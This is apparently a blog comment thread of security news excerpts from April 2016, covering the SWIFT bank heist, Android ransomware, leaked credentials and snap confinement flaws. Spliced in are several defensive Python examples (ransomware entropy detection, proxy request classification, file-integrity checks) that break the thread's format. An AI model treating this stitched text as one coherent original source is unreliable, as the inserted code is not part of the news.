    Alexander Hanff, a privacy campaigner and programmer, says he has received a letter from the European Commission confirming that browser-side web scripts that pick out advert blockers access people’s personal data (ie: the plugin stored on their computer). Thus, just like you need to give permission to EU websites to access and store your cookies, ad-blocker detectors must ask for permission before probing your browser.

    Therefore, under EU law in force since May 2011, people must give their consent before an anti-ad-blocker script can run and hide content on a page. Of course, while waiting for that consent from a visitor, the site could refuse to show anything, but then the publisher will scare off all readers, even the ones who turn out to be not running anti-ad plugins. If the page is viewable while waiting for the consent, then blocking ad-blockers is pointless.

    Reply
  11. Tomi Engdahl says:

    This Teddy Bear Steals Your Ubuntu Secrets
    http://hackaday.com/2016/04/22/this-teddy-bear-steals-your-ubuntu-secrets/

    Ubuntu just came out with the new long-term support version of their desktop Linux operating system. It’s got a few newish features, including incorporating the “snap” package management format. One of the claims about “snaps” is that they’re more secure — being installed read-only and essentially self-contained makes them harder to hack across applications. In principle.

    [mjg59] took issue with their claims of increased cross-application security. And rather than just moan, he patched together an exploit that’s disguised as a lovable teddy bear. The central flaw is something like twenty years old now; X11 has no sense of permissions and any X11 application can listen in on the keyboard and mouse at any time, regardless of which application the user thinks they’re providing input to. This makes writing keylogging and command-insertion trojans effortless, which is just what [mjg59] did. You can download a harmless version of the demo at [mjg59]’s GitHub.

    Circumventing Ubuntu Snap confinement
    http://mjg59.dreamwidth.org/42320.html

    Reply
  12. Tomi Engdahl says:

    Cyber Insurance: Security Tool or Hype?
    http://www.securityweek.com/cyber-insurance-security-tool-or-hype

    A few months back, I was a passive observer to an interesting email thread. People on the thread were discussing a breach that was big news at the time. Suggestions were made as to why the breach occurred, how it may have occurred, how the response could have been better executed, among many other points. At one point in the discussion, one individual decided to interject the concept of cyber insurance in a mocking and condescending tone. In other words, the individual did not feel that cyber insurance was a valid topic worthy of serious discussion.

    In the past, I’ve written about the challenges that the security community has with mocking and condescending, and the tremendous disservice it does us in terms of improving the state of security. I don’t wish to further discuss that subject in this piece, though this incident does raise another interesting discussion. Is cyber insurance a valid tool in the security professional’s tool belt, or is it merely hype? Although mocking and condescending is never justified in my opinion, it is possible to understand those who would respond to extreme hype in that manner.

    For our purposes, at an executive or board level, the risk from a security issue (sometimes referred to as a cyber event) can be rolled up into two main categories at a strategic level:

    ● Near-term costs incurred because of incident response, liabilities, notification requirements, fines, penalties, legal fees, and other such expenses

    ● Long-term costs incurred because of damage to the business, damage to the brand reputation, loss of customer confidence, loss of business partners, and other such losses

    What we quickly realize when we look at risk from a strategic perspective is that it all comes down to cost. There are many details and moving parts to a holistic security program based upon a sound and strategic risk mitigation strategy. But when boards and executives think about security, they think about costs. What will it cost for me to mitigate the risk that I will suffer significant losses and incur significant costs in the event of a security incident or breach? As security professionals, we may not like the way that point of view feels, but it’s important that we understand it.

    When we think of security in these terms, we can begin to see how cyber insurance fits into the broader context of a security strategy focused on risk mitigation. In some cases, people, process, and technology may be able to mitigate huge risks and huge potential costs for a reasonable investment. In other cases, the investment required to properly mitigate a risk through people, process, and technology may be disproportionately high. If that is the case, what is an organization to do?

    This is where cyber insurance can play a role in rounding out an organization’s risk mitigation strategy. Of course, cyber insurance varies widely in what it covers and at what levels, so it’s important to thoroughly examine coverage when shopping around.

    It’s also important to remember what cannot be covered, such as theft of intellectual property and remediation of a breach.

    Reply
  13. Tomi Engdahl says:

    Windows AppLocker Bypassed to Execute Remote Scripts
    http://www.securityweek.com/windows-applocker-bypassed-execute-remote-scripts

    Microsoft’s Windows AppLocker, a feature introduced in Windows 7 to specify which users can run apps within an organization, can be bypassed to execute remote scripts on a machine, a researcher says.

    Reply
  14. Tomi Engdahl says:

    Attackers Use PowerShell, Google Docs to Deliver “Laziok” Trojan
    http://www.securityweek.com/attackers-deliver-laziok-trojan-google-docs

    Malicious actors have abused PowerShell and Google Docs to deliver a Trojan known as Laziok, FireEye reported on Thursday.

    Laziok, a reconnaissance tool and information stealer, was first spotted last year when a threat group leveraged the malware in a sophisticated multi-stage attack campaign targeting energy companies in the Middle East. Attackers exploited an old Windows vulnerability tracked as CVE-2012-0158 to drop the Trojan onto users’ systems.

    According to FireEye, attackers found a way to bypass Google’s security checks and uploaded the malicious payload to Google Docs. The malware was uploaded in March and remained there until Google was notified by the security firm.

    “Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google’s security checks,” researchers said. “Following our notification, Google promptly removed the malicious file and it can no longer be fetched.”

    Reply
  15. Tomi Engdahl says:

    Ransomware: A Formidable Enterprise Threat
    http://www.securityweek.com/ransomware-formidable-enterprise-threat

    Ransomware’s extortion-based business model, currently the latest major trend in the cybercrime industry, is marking a major change in the purpose and outcome of malware attacks and has become a major threat to consumers and enterprises alike.

    Almost unheard of a few years ago, ransomware attacks are making the headlines almost daily, with new malware families emerging nearly every week. This should not be surprising, as the underlying business model for cybercriminals is to hit as many victims as possible and monetize attacks before security researchers react and block their malicious activities.

    Ransomware attacks are carried out in a similar manner each time, regardless of the ransomware family involved: the malware is distributed via spam emails or exploit kits, files are encrypted (usually using AES encryption), and the victim is urged to pay a ransom of $200–$400 in order to recover their files. That might not seem like a lot, but crooks have already made off with hundreds of millions from extorting a large number of victims.

    Ransomware operators almost exclusively use Bitcoin addresses for payments in an attempt to hide their identities.

    Reply
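    The attack pattern described above (files encrypted with AES, often renamed) is what most ransomware detection heuristics key on. The following is an added example, not code from the page or from the SecurityWeek article: a Python scan that combines byte entropy with a second signal, because high entropy alone would also flag compressed media. The sample files, signatures and thresholds are constructed for the demonstration.

```python
import math
import os
import random
import tempfile
from collections import Counter

# File signatures for a few common formats. A file whose name claims one of these
# types but whose first bytes no longer match has most likely been overwritten.
# None means the format has no fixed signature (plain text).
MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".pdf": b"%PDF",
    ".docx": b"PK\x03\x04",  # OOXML documents are zip containers
    ".txt": None,
}
HIGH_ENTROPY = 7.0   # bits/byte: AES output is ~7.99, English text roughly 4-5
MAX_READ = 64 * 1024  # inspect only the first 64 KiB of each file


def shannon_entropy(data):
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(name, data):
    """Return a reason if the content looks like ransomware output, else None.

    High entropy alone is not enough: compressed media is also near 8 bits/byte,
    so a file is flagged only when entropy is combined with a second signal: an
    extension that is not a known format (e.g. an appended '.locked') or a known
    extension whose magic bytes are gone (encrypted in place, not renamed).
    """
    _, ext = os.path.splitext(name.lower())
    ent = shannon_entropy(data)
    if ent < HIGH_ENTROPY:
        return None
    if ext not in MAGIC:
        return f"entropy {ent:.2f} with unrecognised extension {ext!r}"
    sig = MAGIC[ext]
    if sig is None:
        return f"entropy {ent:.2f} for a plain-text file"
    if not data.startswith(sig):
        return f"entropy {ent:.2f} and {ext} signature missing"
    return None


def scan_directory(root, burst_threshold=2):
    """Classify every file under root. Returns (findings, burst); burst is True
    when at least burst_threshold files look encrypted, the pattern of a
    ransomware run rather than a single odd file."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            with open(os.path.join(dirpath, fn), "rb") as f:
                reason = classify(fn, f.read(MAX_READ))
            if reason:
                findings[fn] = reason
    return findings, len(findings) >= burst_threshold


# Constructed sample files (not real user data): two benign, two "encrypted".
_rng = random.Random(20160425)


def _noise(n):
    return bytes(_rng.getrandbits(8) for _ in range(n))


SAMPLES = {
    "notes.txt": b"Quarterly report: revenue grew modestly in Q1. " * 50,
    "photo.jpg": b"\xff\xd8\xff\xe0" + _noise(3000),  # JPEG header + dense data
    "report.docx.locked": _noise(4096),               # renamed and encrypted
    "invoice.pdf": _noise(4096),                      # encrypted in place
}


def demo():
    with tempfile.TemporaryDirectory() as root:
        for name, data in SAMPLES.items():
            with open(os.path.join(root, name), "wb") as f:
                f.write(data)
        return scan_directory(root)


if __name__ == "__main__":
    findings, burst = demo()
    for name, reason in findings.items():
        print(f"{name}: {reason}")
    print("burst:", burst)
```

    The JPEG sample is deliberately high-entropy yet is not flagged because its signature is intact; the in-place-encrypted PDF is caught by the missing signature even though it was never renamed. On a real host the same logic belongs in a file-system watcher that reacts to a burst of such writes, not in a one-off scan.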
  16. Tomi Engdahl says:

    Why You Need Visibility of Your Supply Chain Cyber Risks
    http://www.securityweek.com/why-you-need-visibility-your-supply-chain-cyber-risks

    When it comes to cybersecurity, the common tack is to build out your network defenses and then extend to endpoints. But as business becomes more connected and as data moves further outside the organizational walls, enterprises must look at weaknesses across each area that depends on technology – and a good place to focus is on the supply chain.

    Think about how many partners, suppliers and customers have access to different areas of your business. According to the 2016 Vendor Vulnerability survey from Bomgar, an average of 89 third-party vendors access a typical company’s network each week, and 75% of the surveyed organizations said the number of third parties they work with has increased over the last two years. Additionally, more and more companies are outsourcing critical business infrastructure to third parties that provide numerous “As-A-Service” capabilities. This in turn creates or magnifies an additional business resilience risk that is largely unchecked.

    Each of these touch points creates another area of possible exploitation. But the risk posed by the growing number of third parties is often not adequately addressed. In fact, PwC’s 2015 U.S. State of Cybercrime Survey found only 16% of respondents evaluate third parties’ cybersecurity more than once a year – and nearly a quarter do not evaluate third parties at all. Ever.

    Reply
  17. Tomi Engdahl says:

    Lorenzo Franceschi-Bicchierai / Motherboard:
    DARPA seeks encrypted comms app with blockchain infrastructure, message repudiation, self-deleting messages, more in Small Business Technology Transfer request

    DARPA Is Looking For The Perfect Encryption App, and It’s Willing to Pay
    http://motherboard.vice.com/read/darpa-decentralized-blockchain-encryption-messaging-app

    While the FBI keeps crying wolf about the dangerous dark future where criminals use technology that’s impossible to spy on, the Pentagon’s blue-sky research arm wants someone to create the ultimate hacker-proof messaging app.

    The Defense Advanced Research Projects Agency, better known as DARPA, is looking for a “secure messaging and transaction platform” that would use the standard encryption and security features of current messaging apps such as WhatsApp, Signal, or Ricochet, but also use a decentralized Blockchain-like backbone structure that would be more resilient to surveillance and cyberattacks.

    DARPA’s goal is to have “a secure messaging system that can provide repudiation or deniability, perfect forward and backward secrecy, time to live/self delete for messages, one time eyes only messages, a decentralized infrastructure to be resilient to cyber-attacks, and ease of use for individuals in less than ideal situations,” according to a notice looking for proposals, which was recently posted on a government platform that offers federal research funds to small businesses.

    DARPA wants “a public wall anyone can monitor or post messages on, but only correct people can decrypt.”

    Reply
  18. Tomi Engdahl says:

    Anti-Encryption Social Media Campaign Backfires Spectacularly
    http://motherboard.vice.com/read/nypd-manhattan-prosecutor-unlockjustice-anti-encryption-social-media-campaign-backfires?trk_source=recommended

    As even the most deft social media ninja will tell you, social media campaigns are hard. But it really seems like the New York Police Department should have seen this one coming.

    A coalition led by the NYPD and Manhattan’s top prosecutor launched a campaign to “highlight the impact encryption is having on public safety and victims of crime” on Monday. The campaign took off with a press conference on the steps of Manhattan’s City Hall, along with a hashtag, #UnlockJustice, designed to garner social media support.

    “Americans have a right to privacy, but crime victims and surviving family members have rights, too–namely, the right to have cases solved with the strongest evidence available,” Manhattan’s District Attorney Cyrus Vance said.

    But the hashtag launched along with the campaign fell flat, and soon backfired. Several people, including tech and security experts, hijacked the hashtag to criticize the coalition’s campaign.

    “Governments are trying to get engaged with the internet while not understanding how the internet works,” Amie Stepanovich, the policy manager at Access Now, a digital rights group, told me.

    “Seriously, whoever in the NYPD and the Manhattan DA’s office greenlighted this needs to get a different job,”

    This is not the first time something like this has happened.

    Reply
  19. Tomi Engdahl says:

    Hacker Collective Attacks KKK Sites
    https://politics.slashdot.org/story/16/04/24/0425232/hacker-collective-attacks-kkk-sites

    A KKK web site went offline for several hours Saturday, part of an ongoing attack campaign being attributed to “several hacker collectives, including Anonymous and BinarySec, under a loosely-coordinated operation they’re calling #OpKKK.” The Epoch Times newspaper reports that “Over the course of the last couple months, websites belonging to the KKK flicked off and on, members of the hate group have had their identities posted online, and their recruiting efforts have been attacked.”

    Hackers Have Launched a War Against the KKK and the Spread of Online Hate
    http://www.theepochtimes.com/n3/2031112-hackers-have-launched-a-war-against-the-kkk-and-the-spread-of-online-hate/

    Hackers are launching a campaign against the promotion of hatred and racism online, and one of their main targets is the Ku Klux Klan (KKK).

    Over the course of the last couple months, websites belonging to the KKK flicked off and on, members of the hate group have had their identities posted online, and their recruiting efforts have been attacked.

    This has been the work of several hacker collectives, including Anonymous and BinarySec, under a loosely-coordinated operation they’re calling #OpKKK.

    “The average American likely believes hate groups like the KKK are all but dead and gone, restricted now to a handful of secret enclaves consisting of a few dying old racist men,”

    “But, part of OpKKK is bringing attention to the fact that these groups are not dead and are in fact finding a new life online,”

    Reply
  20. Tomi Engdahl says:

    Win XP, Flash, Java… healthcare makes easy pickings for hackers
    Study shows some medical folk are still running an OS not supported since 2014
    http://www.theregister.co.uk/2016/04/22/healthcare_insecurity/

    The healthcare industry is a long way behind the financial sector in basic security practices, according to a study by two factor authentication firm Duo Security.

    Duo found that healthcare devices were significantly more out of date and less secure than ones from finance, after comparing its healthcare customers’ devices to its finance customers’ equipment.

    Healthcare has a four times greater density of Windows XP computers compared to finance. Windows XP has been unsupported by Microsoft since 2014 and unsupported OSes do not receive any software patches or updates, making them an easy target for attackers.

    The risk is far from theoretical. For example, earlier this year Melbourne Health’s networks were infected with malware after an attack compromised the Royal Melbourne Hospital’s pathology department, which was running Windows XP.

    The Qbot malware linked to the infection is capable of stealing passwords and logging keystrokes.

    A significant minority (three per cent) of Duo’s installed base is stuck on Windows XP, which compares to one per cent of users across Duo’s entire client base. Across that customer base, finance has 50 per cent more instances of computers running on the Windows 10 operating system than healthcare.

    Finance has more instances of computers running on Windows 7 (74 per cent) than healthcare (66 per cent). Staying with older versions of Microsoft’s OS can have security downsides, even if the operating system is still supported.

    With more than 500 known vulnerabilities affecting Windows 7, there are many ways for an attacker to easily exploit flaws on the outdated OS to gain unauthorised access to a healthcare organisation’s computing environment, Duo warns.

    Twice as many healthcare endpoints have Flash installed and three times as many healthcare customers have Java installed on their devices, again putting them at greater risk of vulnerabilities and exploitation.

    Only 12 per cent of non-healthcare users have Java installed, compared to 36 percent in healthcare. Many popular electronic healthcare record (EHRs) systems and identity access and management (IAM) software supporting e-prescriptions require the use of Java, factors which could account for the higher installed base. But this is bad news for security because Java browser plug-ins are a popular exploit route for hackers.

    Reply
  21. Tomi Engdahl says:

    Opera VPN behind the curtains is just a proxy, here’s how it works
    https://gist.github.com/spaze/558b7c4cd81afa7c857381254ae7bd10

    When setting up (that’s immediately when the user enables it in settings) Opera VPN sends a few API requests to https://api.surfeasy.com to obtain credentials and proxy IPs, see below, also see The Oprah Proxy.

    The browser then talks to a proxy de0.opera-proxy.net (when VPN location is set to Germany), its IP address can only be resolved from within Opera when VPN is on, it’s 185.108.219.42 (or similar, see below). It’s an HTTP/S proxy which requires auth.

    When loading a page with Opera VPN enabled, the browser sends a lot of requests to de0.opera-proxy.net with Proxy-Authorization request header.

    This Opera “VPN” is just a preconfigured HTTP/S proxy protecting just the traffic between Opera and the proxy, nothing else. It’s not a VPN.

    They even call it Secure proxy (besides calling it VPN, sure) in Opera settings.

    Reply
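    The distinction the gist draws, an HTTP/S proxy with Proxy-Authorization versus a VPN, is visible in the shape of the requests themselves. The following is an added example, not code from the page or from the gist: a small Python parser that classifies an HTTP/1.x request head by its request-target form and reports what a proxy in that path gets to see. The request heads and the user:pass Basic credential are constructed for the demonstration, not captured Opera traffic; the proxy host names and IPs from the gist are not used.

```python
import base64
from urllib.parse import urlsplit

# Constructed request heads (not traffic captured from Opera). They show the three
# request-target forms of RFC 7230 section 5.3: origin-form as sent straight to a
# web server, and authority-form (CONNECT) and absolute-form as sent to a proxy.
# The Basic credential is the constructed pair user:pass, base64-encoded.
SAMPLES = {
    "direct": b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n",
    "connect": (b"CONNECT example.com:443 HTTP/1.1\r\n"
                b"Host: example.com:443\r\n"
                b"Proxy-Authorization: Basic dXNlcjpwYXNz\r\n\r\n"),
    "absolute": (b"GET http://example.com/news HTTP/1.1\r\n"
                 b"Host: example.com\r\n"
                 b"Proxy-Authorization: Basic dXNlcjpwYXNz\r\n\r\n"),
}


def parse_request(raw):
    """Split an HTTP/1.x request head into (method, target, headers).
    Header names are lower-cased; a repeated name keeps its last value."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def basic_user(headers):
    """Username from a Basic Proxy-Authorization header, or None.
    Basic is only base64, so on a plaintext proxy leg the credential is readable."""
    value = headers.get("proxy-authorization", "")
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded.split(":", 1)[0]


def classify(raw):
    """Describe the path a request takes and what a proxy operator on it can see."""
    method, target, headers = parse_request(raw)
    if method == "CONNECT":
        proxied = True
        destination = target
        visible = "destination host:port; the tunnelled TLS bytes are opaque"
    elif target.startswith(("http://", "https://")):
        proxied = True
        destination = urlsplit(target).netloc
        visible = "full URL, headers and body (plain HTTP relayed by the proxy)"
    else:
        proxied = False
        destination = headers.get("host")
        visible = "nothing: no proxy in the path"
    return {
        "method": method,
        "proxied": proxied,
        "destination": destination,
        "proxy_auth": "proxy-authorization" in headers,
        "basic_user": basic_user(headers),
        "visible_to_proxy": visible,
    }


if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, classify(raw))
```

    The point to take from the output is the `visible_to_proxy` field: a CONNECT-based proxy still learns every destination host you visit, and a plain-HTTP request through it is fully readable, which is the limit the gist describes as “protecting just the traffic between Opera and the proxy.” A VPN, by contrast, would show none of these request forms on the wire at all, only an encrypted tunnel carrying whole packets.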
  22. Tomi Engdahl says:

    $10 router blamed in Bangladesh bank hack
    http://www.bbc.com/news/technology-36110421

    Hackers managed to steal $80m (£56m) from Bangladesh’s central bank because it skimped on network hardware and security software, reports Reuters.

    The bank had no firewall and used second-hand routers that cost $10 to connect to global financial networks.

    Better security and hardware would have hampered the attackers, Reuters said, quoting an official investigator.

    A firewall would have made attempts to hack the bank more “difficult”

    The cheap routers have hindered the investigation, said Mr Alam, because they collected very little network data that could be used to pinpoint the hackers and shed light on their tactics.

    Reply
  23. Tomi Engdahl says:

    Passwords? Just Use Your Head!
    http://hackaday.com/2016/04/25/passwords-just-use-your-head/

    Biometrics–the technique of using something unique about your body as a security device–promises to improve safety while being more convenient than a password. Fingerprints, retinal scans, and voice identification have all found some use, although not without limitations.

    Now researchers in Germany want you to use your head, literally. SkullConduct measures vibrations of your skull in response to a sonic signal. A small prototype was successful and is particularly well suited for something you are holding up to your head anyway, like a smartphone or a headset like a Google Glass.

    SkullConduct: Biometric User Identification on Eyewear Computers Using Bone Conduction Through the Skull
    https://perceptual.mpi-inf.mpg.de/files/2016/01/schneegass16_chi.pdf

    Reply
  24. Tomi Engdahl says:

    Jim Finkle / Reuters:
    Researchers: cybercriminals used malware to subvert the SWIFT interbank messaging network and steal $81M from Bangladesh’s central bank; SWIFT releases patch — Bangladesh Bank hackers compromised SWIFT software, warning issued — The attackers who stole $81 million from the Bangladesh …

    Bangladesh Bank hackers compromised SWIFT software, warning issued
    http://www.reuters.com/article/us-usa-nyfed-bangladesh-malware-exclusiv-idUSKCN0XM0DR

    The attackers who stole $81 million from the Bangladesh central bank probably hacked into software from the SWIFT financial platform that is at the heart of the global financial system, said security researchers at British defense contractor BAE Systems.

    SWIFT, a cooperative owned by 3,000 financial institutions, confirmed to Reuters that it was aware of malware targeting its client software. Its spokeswoman Natasha Deteran said SWIFT on Monday released a software update to thwart the malware, along with a special warning for financial institutions to scrutinize their security procedures.

    The developments coming to light in the unprecedented cyber-heist suggest that a lynchpin of the global financial system could be more vulnerable than previously understood because of weaknesses that enabled attackers to modify a SWIFT software program installed on bank servers.

    The new evidence suggests that hackers manipulated the Alliance Access server software, which banks use to interface with SWIFT’s messaging platform, in a bid to cover up fraudulent transfers that had been previously ordered.

    The findings from BAE and SWIFT do not explain how the fraudulent orders were created and pushed through the system.

    The SWIFT messaging platform is used by 11,000 banks and other institutions around the world, though only some use the Alliance Access software, Deteran said.

    “I can’t think of a case where we have seen a criminal go to the level of effort to customize it for the environment they were operating in,” he said. “I guess it was the realization that the potential payoff made that effort worthwhile.”

    Monday’s alert from BAE includes some technical indicators that the firm said it hopes banks could use to thwart similar attacks.

    While that malware was specifically written to attack Bangladesh Bank, “the general tools, techniques and procedures used in the attack may allow the gang to strike again,” according to a draft of the warning that BAE shared with Reuters.

    Reply
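    The report above turns on attackers modifying software installed on the bank’s own servers. One control that catches exactly that class of change is a file-integrity baseline: hash every file of the installed tree at a known-good time, store the manifest somewhere the host cannot write to, and compare on a schedule. The following is an added example, not code from the page, from BAE or from SWIFT; the install tree, file names and contents are constructed stand-ins and do not describe any real product layout.

```python
import hashlib
import os
import tempfile

CHUNK = 64 * 1024


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large binaries are not loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each file under root (path relative to root, '/' separated) to its SHA-256."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def verify(root, baseline):
    """Compare the tree under root with a baseline manifest and report drift:
    files whose hash changed, files that vanished, and files that appeared."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def _write(root, rel, data):
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


# Constructed stand-in for an installed application tree (hypothetical names).
INSTALL = {
    "bin/messaging.exe": b"MZ" + b"\x00" * 64 + b"release build",
    "lib/dbcheck.dll": b"MZ" + b"\x00" * 64 + b"validate records: on",
    "conf/app.ini": b"[core]\nvalidate=1\n",
}


def demo():
    with tempfile.TemporaryDirectory() as root:
        for rel, data in INSTALL.items():
            _write(root, rel, data)
        baseline = build_manifest(root)  # taken at install time, kept off-host
        # Simulated tampering: a library patched, a helper dropped in, a config removed.
        _write(root, "lib/dbcheck.dll", b"MZ" + b"\x00" * 64 + b"validate records: off")
        _write(root, "lib/helper.dll", b"MZ" + b"\x90" * 32)
        os.remove(os.path.join(root, "conf", "app.ini"))
        return verify(root, baseline)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

    The baseline is only worth as much as its storage: if the manifest sits on the same server with the same write permissions as the binaries, whoever can patch the software can also rewrite the manifest, so keep it (or a signature over it) on a separate system and run the comparison from there.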
  25. Tomi Engdahl says:

    Dan Goodin / Ars Technica:
    Critical Android bugs present in older devices now targeted by malvertising campaigns and other drive-by exploits — Active drive-by exploits critical Android bugs, care of Hacking Team — Hostile JavaScript delivered through ads installs ransomware on older Android phones.

    Active drive-by exploits critical Android bugs, care of Hacking Team
    Hostile JavaScript delivered through ads installs ransomware on older Android phones.
    http://arstechnica.com/security/2016/04/active-drive-by-attacks-exploit-critical-android-bugs-care-of-hacking-team/

    An ongoing drive-by attack is forcing ransomware onto Android smartphones by exploiting critical vulnerabilities in older versions of Google’s mobile operating system still in use by millions of people, according to research scheduled to be published Monday.

    The attack combines exploits for at least two critical vulnerabilities contained in Android versions 4.0 through 4.3, including an exploit known as Towelroot, which gives attackers unfettered “root” access to vulnerable phones. The exploit code appears to borrow heavily from, if not copy outright, some of these Android attack scripts, which leaked to the world following the embarrassing breach of Italy-based Hacking Team in July. Additional data indicates devices running Android 4.4 may also be infected, possibly by exploiting a different set of vulnerabilities.

    It’s the first time—or at least one of only a handful of times—Android vulnerabilities have been exploited in real-world drive-by attacks.

    Reply
  26. Tomi Engdahl says:

    Sarah Perez / TechCrunch:
    Hundreds of Spotify users’ credentials appear online, and users report accounts hacked; Spotify denies being hacked

    Hundreds of Spotify credentials appear online – users report accounts hacked, emails changed
    http://techcrunch.com/2016/04/25/hundreds-of-spotify-credentials-appear-online-users-report-accounts-hacked-emails-changed/

    A list containing hundreds of Spotify account credentials – including emails, usernames, passwords, account type and other details – has popped up on the website Pastebin, in what appears to be a possible security breach.

    It’s unclear, then, where these particular account details were acquired,

    Spotify has dealt with security incidents in the past, so one can’t immediately assume that a list of emails like this is related to a new data breach.

    To resolve the matter, users said they’ve had to work with Spotify customer service to get their account access restored.

    Reply
  27. Tomi Engdahl says:

    BeautifulPeople.com Leaks Very Private Data of 1.1 Million ‘Elite’ Daters — And It’s All For Sale
    http://www.forbes.com/sites/thomasbrewster/2016/04/25/beautiful-people-hack-sexual-preference-location-addresses/#e8bd318559fd

    Sexual preference. Relationship status. Income. Address. These are just some details applicants for the controversial dating site BeautifulPeople.com are asked to supply before their physical appeal is judged by the existing user base, who vote on who is allowed in to the “elite” club based on looks alone. All of this, of course, is supposed to remain confidential. But much of that supposedly-private information is now public, thanks to the leak of a database containing sensitive data of 1.1 million BeautifulPeople.com users. The leak, according to one researcher, also included 15 million private messages between users. Another said the data is now being sold by traders lurking in the murky corners of the web.

    But the information – which now appears to be real user data despite being hosted on a non-production server – was taken by one or more less-than-scrupulous individuals before the lockdown, making it out into the dirty world of data trading this year. That’s according to Troy Hunt, an Australian security expert who runs the website HaveIBeenPwned.com, where people can check if their own information has been leaked in some of the biggest breaches in recent memory, from Adobe to Ashley Madison. The data has been traded online, Hunt said,

    Other leaked data included weight, height, job, education, body type, eye colour and hair hue, as well as email address and mobile phone number. Location data, in the form of latitude and longitude, were also leaked, along with smoking and drinking habits, interests and favourite TV shows, movies and books. Anyone using the site expecting privacy should now consider themselves exposed, right down to their appearance, whereabouts and interests.

    Today, the company re-sent its original statement on the breach, first received by FORBES in December. “We can confirm we were notified of a breach on December 24th of 2015 of one of our MongoDB test servers.”

    Reply
  28. Tomi Engdahl says:

    Exclusive: SWIFT warns customers of multiple cyber fraud cases
    http://www.reuters.com/article/us-cyber-banking-swift-exclusive-idUSKCN0XM2DI

    SWIFT, the global financial network that banks use to transfer billions of dollars every day, warned its customers on Monday that it was aware of “a number of recent cyber incidents” where attackers had sent fraudulent messages over its system.

    The disclosure came as law enforcement authorities in Bangladesh and elsewhere investigated the February cyber theft of $81 million from the Bangladesh central bank account at the New York Federal Reserve Bank. SWIFT has acknowledged that the scheme involved altering SWIFT software on Bangladesh Bank’s computers to hide evidence of fraudulent transfers.

    BAE’s evidence suggested that hackers manipulated SWIFT’s Alliance Access server software, which banks use to interface with SWIFT’s messaging platform, to cover their tracks.

    SWIFT provided some evidence about how that happened in its note to customers, saying that in most cases the modus operandi was similar.

    Reply
  29. Tomi Engdahl says:

    Website extortionists rake in over $100,000 without lifting a finger
    ‘Armada Collective’ threatens to carry out DDoS attacks, never actually attacks
    http://www.theregister.co.uk/2016/04/25/extortionists_rake_in_100000_easy/

    Reputation is everything in business: it appears a bunch of canny scammers have stolen the identity of a hacking squad to make some serious bank.

    Back in November, a group calling itself the Armada Collective carried out a series of distributed denial of service (DDoS) attacks on webmail providers who refused to pay them a protection fee in Bitcoins. Some alleged members of the group were arrested in January, but now reports are coming in that someone is purely using their reputation for criminal gain.

  30. Tomi Engdahl says:

    Facebook’s own TLS cert used by crooks in double logon phish
    Phish me once, shame on Facebook; phish me twice, shame on Facebook anyway
    http://www.theregister.co.uk/2016/04/26/phishers_target_security_skeptics_with_tempting_facebook_validation_bait/

    Netcraft security man Paul Mutton says phishers are using Facebook’s TLS certificate to create a ‘remarkably convincing’ scam that would go unnoticed by most users.

    The phish uses an iframe to serve a Facebook verification form, but that form isn’t from The Social Network™. Instead, the form comes from an external Hostgator site that uses HTTPS and Facebook’s certificate.

    That combination means browsers don’t warn users of the impending danger.

    Once users log in from the form in the iframe, a second fake login form appears claiming that the details entered into the first fake form were incorrect. Users are prompted to log in again.

  31. Tomi Engdahl says:

    Revealed: The Bangladeshi malware that screwed SWIFT out of $81m
    Global payments system upgrade to block future attacks
    http://www.theregister.co.uk/2016/04/25/bangladeshi_malware_screwed_swift/

    February’s hack against Bangladesh’s central bank that netted $81m in diverted funds is one of the biggest cyber heists of all time, and now researchers think they’ve found the malware that did it.

    The software was spotted on a Bangladeshi malware forum by researchers at defense contractors BAE Systems, and appears to have been custom-made to fool the SWIFT (Society for Worldwide Interbank Financial Telecommunication) global payments system and its Alliance Access backend.

    SWIFT is an international inter-bank payments system. The malware was designed to set up fraudulent transfers using the network, bypass the safety routines set up by the banking industry, and then cover the tracks of the thieves long enough for them to launder the funds.

  32. Tomi Engdahl says:

    Joseph Menn / Reuters:
    Apple says it received its first FBI tip via Vulnerability Equities Process on April 14; vulnerability already fixed on iOS9 and El Capitan

    Apple says FBI gave it first vulnerability tip on April 14
    http://www.reuters.com/article/us-apple-encryption-fbi-disclosure-idUSKCN0XO00T

    The FBI informed Apple Inc of a vulnerability in its iPhone and Mac software on April 14, the first time it had told the company about a flaw in Apple products under a controversial White House process for sharing such information, the company told Reuters on Tuesday.

    The FBI told the company that the disclosure resulted from the so-called Vulnerability Equities Process for deciding what to do with information about security holes, Apple said.

    The process, which has been in place in its current form since 2014, is meant to balance law enforcement and U.S. intelligence desires to hack into devices with the need to warn manufacturers so that they can patch holes before criminals and other hackers take advantage of them.

  33. Tomi Engdahl says:

    Qatari hack: bank ‘investigating’ leak
